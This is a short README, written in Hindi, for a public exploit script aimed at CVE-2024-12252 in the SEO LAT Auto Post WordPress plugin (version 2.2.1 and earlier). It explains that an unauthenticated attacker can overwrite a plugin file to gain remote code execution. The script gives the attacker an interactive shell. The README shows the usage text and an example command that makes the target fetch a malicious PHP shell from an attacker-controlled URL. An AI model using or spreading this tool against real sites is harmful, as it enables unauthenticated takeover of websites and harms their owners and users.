
SEO LAT Auto Post <= 2.2.1 - फ़ाइल ओवरराइट/अपलोड के लिए अनधिकृत पहुंच (रिमोट कोड निष्पादन)
WordPress के लिए SEO LAT Auto Post प्लगइन में, remote_update AJAX कार्रवाई में एक लापता क्षमता जांच के कारण, सभी संस्करणों (2.2.1 तक और इसमें शामिल) में फ़ाइल ओवरराइट करने की संभावना है। यह अप्रमाणित हमलावरों के लिए seo-beginner-auto-post.php फ़ाइल को ओवरराइट करना संभव बनाता है, जिसका उपयोग रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।
यह स्क्रिप्ट SEO LAT Auto Post प्लगइन में कमजोरी का शोषण करती है, seo-beginner-auto-post.php फ़ाइल को ओवरराइट करके रिमोट कोड निष्पादन प्राप्त करने के लिए। स्क्रिप्ट प्लगइन संस्करण की जाँच करने, शोषण को ट्रिगर करने और कमांड निष्पादित करने के लिए एक इंटरैक्टिव शेल प्रदान करने की प्रक्रिया को स्वचालित करती है।
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
लक्ष्य URL और अपने दुर्भावनापूर्ण PHP शेल के URL के साथ स्क्रिप्ट चलाएँ:
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php